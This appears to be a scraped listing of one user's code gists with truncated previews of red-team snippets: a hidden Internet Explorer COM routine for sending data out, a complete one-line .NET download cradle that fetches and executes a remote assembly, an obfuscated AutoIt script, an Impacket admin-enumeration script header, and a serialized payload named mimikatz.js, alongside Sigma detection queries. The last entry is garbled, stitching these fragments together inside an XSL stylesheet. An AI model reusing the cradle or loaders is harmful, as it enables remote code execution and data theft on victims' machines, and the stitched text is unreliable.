johnjohnsp1

## ie_com.cs
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
    Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
    object IE = Activator.CreateInstance(com_type);

    object[] falseArr = new object[] { false };
    object[] trueArr = new object[] { true };
    com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
    com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);

## graylog_sigma_queries
# This is not my work. All credit goes to https://github.com/Neo23x0/sigma. I just used the tool to convert to graylog format,
# skipped over the errors, and added some carriage returns for ease of reading. If you see a blank rule, it means there was a conversion error.


rules/application/appframework_django_exceptions.yml

("SuspiciousOperation" OR "DisallowedHost" OR "DisallowedModelAdminLookup" OR "DisallowedModelAdminToField" OR "DisallowedRedirect" OR "InvalidSessionKey" OR "RequestDataTooBig" OR "SuspiciousFileOperation" OR "SuspiciousMultipartForm" OR "SuspiciousSession" OR "TooManyFieldsSent" OR "PermissionDenied")


## settingcontent-ms.xsd
<?xml version="1.0" encoding="utf-8"?>
<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ac="http://schemas.microsoft.com/Search/2013/SettingContent" targetNamespace="http://schemas.microsoft.com/Search/2013/SettingContent" elementFormDefault="qualified" >
	<xsd:annotation>
		<xsd:documentation xml:lang="en">Copyright (C) Microsoft. All rights reserved.
Searchable setting content file schema.
		</xsd:documentation>
	</xsd:annotation>
	<xsd:element name="SearchableContent" type="ac:SearchableContentType"/>
	<xsd:complexType name="SearchableContentType">
		<xsd:sequence>

## DotnetAssemblyDownloadCradle.cs
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }

## YQYgT.au3
#NoTrayIcon
#EndRegion
Dim $IIThbVLLWS = "1"
Dim $CWBFTZBdRBF = "YQYg"
Dim $CWBFTZBdRBFN = "YQYgT"
Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
Dim $bBOiAYNfPdZMWb = "BFfLbS"
Dim $bBOiAYNfPdZMWbP = Int("0")
Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
Dim $iECUAbJPJJTThfEIU = "0"

## win2usb.sh
#!/bin/bash

# sudo !!

echo "

                        __
                   ,-~¨^  ^¨-,           _,
                   /          / ;^-._...,¨/
                  /          / /         /

## lookupadmins.py
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

## lookupadmins.py
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

## mimikatz.js

var serialized_obj = [
0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,

## gist:2a65b00d7c5d47ebe03a96319818e81d
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation.  All rights reserved. -->

<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />

<ms:script implements-prefix="user" language="JScript">
<![CDATA[
	// sample function that takes in a destination server, POST data, and custom HTTP request headers
	private string SendData(string dst, byte[] postData, string customHeaders)
	{
	Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
	object IE = Activator.CreateInstance(com_type);

	object[] falseArr = new object[] { false };
	object[] trueArr = new object[] { true };
	com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
	com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);
	# This is not my work. All credit goes to https://github.com/Neo23x0/sigma. I just used the tool to convert to graylog format,
	# skipped over the errors, and added some carriage returns for ease of reading. If you see a blank rule, it means there was a conversion error.


	rules/application/appframework_django_exceptions.yml

	("SuspiciousOperation" OR "DisallowedHost" OR "DisallowedModelAdminLookup" OR "DisallowedModelAdminToField" OR "DisallowedRedirect" OR "InvalidSessionKey" OR "RequestDataTooBig" OR "SuspiciousFileOperation" OR "SuspiciousMultipartForm" OR "SuspiciousSession" OR "TooManyFieldsSent" OR "PermissionDenied")
	<?xml version="1.0" encoding="utf-8"?>
	<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ac="http://schemas.microsoft.com/Search/2013/SettingContent" targetNamespace="http://schemas.microsoft.com/Search/2013/SettingContent" elementFormDefault="qualified" >
	<xsd:annotation>
	<xsd:documentation xml:lang="en">Copyright (C) Microsoft. All rights reserved.
	Searchable setting content file schema.
	</xsd:documentation>
	</xsd:annotation>
	<xsd:element name="SearchableContent" type="ac:SearchableContentType"/>
	<xsd:complexType name="SearchableContentType">
	<xsd:sequence>
	#NoTrayIcon
	#EndRegion
	Dim $IIThbVLLWS = "1"
	Dim $CWBFTZBdRBF = "YQYg"
	Dim $CWBFTZBdRBFN = "YQYgT"
	Dim $PMHTbZHeQhgeW = "FuyOUaWDQXzcuubQ"
	Dim $bBOiAYNfPdZMWb = "BFfLbS"
	Dim $bBOiAYNfPdZMWbP = Int("0")
	Dim $WPfGbcDOKNbChUgJ = "fTNSTWFKWVKG"
	Dim $iECUAbJPJJTThfEIU = "0"
	#!/bin/bash

	# sudo !!

	echo "

	__
	,-~¨^ ^¨-, _,
	/ / ;^-._...,¨/
	/ / / /
	#!/usr/bin/env python
	#
	# Title: lookupadmins.py
	# Author: @ropnop
	# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
	# Similar in function to Get-NetLocalGroup from Powerview
	# Won't work against Windows 10 Anniversary Edition unless you already have local admin
	# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
	#
	# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket

	var serialized_obj = [
	0,1,0,0,0,255,255,255,255,1,0,0,0,0,0,0,0,4,1,0,0,0,34,83,121,115,116,101,109,46,68,101,108,
	101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,3,0,0,0,8,68,101,108,
	101,103,97,116,101,7,116,97,114,103,101,116,48,7,109,101,116,104,111,100,48,3,3,3,48,83,121,115,116,101,109,46,
	68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,43,68,101,108,101,
	103,97,116,101,69,110,116,114,121,34,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,83,101,114,105,97,108,105,
	122,97,116,105,111,110,72,111,108,100,101,114,47,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,77,
	101,109,98,101,114,73,110,102,111,83,101,114,105,97,108,105,122,97,116,105,111,110,72,111,108,100,101,114,9,2,0,0,
	0,9,3,0,0,0,9,4,0,0,0,4,2,0,0,0,48,83,121,115,116,101,109,46,68,101,108,101,103,97,116,101,
	<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
	<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->

	<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
	<xsl:strip-space elements="*" />

	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[